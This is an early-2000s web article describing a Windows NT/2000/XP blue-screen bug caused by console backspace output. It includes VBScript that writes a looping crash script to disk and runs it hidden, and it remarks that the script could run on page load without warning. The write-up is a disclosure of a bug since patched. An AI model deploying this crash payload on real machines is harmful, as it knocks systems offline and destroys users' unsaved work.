HOW TO crash Windows NT 4.0\2000\XP using only VBScript
Update 16/2/2003. It has come to my attention that this bug has been fixed in Windows NT 4.0 SP6.0a,
Windows 2000 SP3 and Windows XP SP1. This script will also only work as a local script, and not in
the VB Script runtime internet zone sand-box.
In the computing journal Windows::Developer in the March 2002 issue on page 44 a small C program
was published that can cause Microsoft Windows NT 4.0 and 2000 to crash. The Windows term for this type of crash is a
"blue-screen" because the Windows user interface disappears and a blue screen is displayed with
diagnostic information in white text. When this happens, the operating system must be rebooted. This type of crash
is normally caused by a device driver causing a STOP, but this program is extremely simple.
The original program
In the article it says that this program was originally posted by Masaru Tsuchiyama on the comp.os.ms-windows.programmer.win32 newsgroup.
On analysis the program runs in an infinite loop continually printing the string "Hung up". The tab character
moves the cursor 4 characters along in the DOS prompt, then the backspaces move the cursor 6 characters back.
In practice, the leading part of the string can be any valid string.
After 2 iterations the cursor is behind the start position, in reality the pointer in the command prompt must
be pointing at random memory. As the program loops again and again it gets further down in memory eventually
causing a protection fault in a Windows subsystem.
I would expect this code to only cause a protection fault in the application and it shouldn't crash the operating system.
Perhaps Microsoft can shed light on this problem? This program does not cause a similar problem on Windows 95\98 or ME.
The script risk
When we saw this, someone commented on the potential danger of this being executed in a script, particularly on a
web page. We thought it was impossible, it's a pity that it wasn't.
VBScript in a web page
I believed that this program could be reproduced purely in script. An executable console application generated
by a C Compiler is one thing, but a script is more dangerous because it could be used on a web page.
If you wish to test this script, download here.
Important! Close all of your applications and save your work before you test this.
For additional safety the script will only run when the button is pressed, but it could be called in the
Window_onLoad handler, crashing the machine without warning.
<input type="BUTTON" name="Write" value="Click me" language=VBS onclick="WriteToFile">
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("c:\hangup.vbs", 2, True)
f.Write "While 1"
f.Write " WScript.StdOut.Write ""a""+chr(9)+chr(8)+chr(8)+chr(8)+chr(8)+chr(8)+chr(8)"
Set f = fso.OpenTextFile("c:\hangup.bat", 2, True)
f.Write "cscript c:\hangup.vbs"
Set w = CreateObject("WScript.Shell")
The page uses the VBScript to write VBScript in a file that will be executed by the CScript.exe scripting
host runtime. CScript.exe is used, as opposed to WScript.exe, because it allows text output to the console.
Note that WScript.StdOut.Write is used. The problem does not occur when WScript.Write is used.
Also note that the batch file is run minimized by passing 2 as the second parameter to the Run
method. This hides the console from the user so they may not see what's happening until it's too late.
This script was written by me to illustrate the problem using the Windows Scripting Host shell to execute the
script and FileSystemObjects to write the dangerous script payload in the page.
This could be executed on a web page, it may even be possible to cause it to be executed on a web server although
I cannot think of a way to do this yet. XML and SOAP servers that load script into a DOM Document may be susceptible
to this. The potential for mischief is enormous!
The bottom line is, if it runs Windows NT 4.0\2000 or XP and it executes this script, it will crash.
The crash screen
Here is a transcript of the crash report on Windows NT 4.0 with Service Pack 6 installed.
STOP: c000021a (Fatal System Error)
The Windows SubSystem system process terminated unexpectedly
with a status of 0xc0000005 (0x77f7d670 0x00a3fa30).
The system has been shut down.
Restart and set the recovery options in the system control panel
or the /CRASHDEBUG system start option. If this message reappears,
contact your system administration or technical support group.
On Windows 2000 with Service Pack 2 installed it caused a blue screen too.
On Windows XP the operating system rebooted but did not blue screen.
Back to index.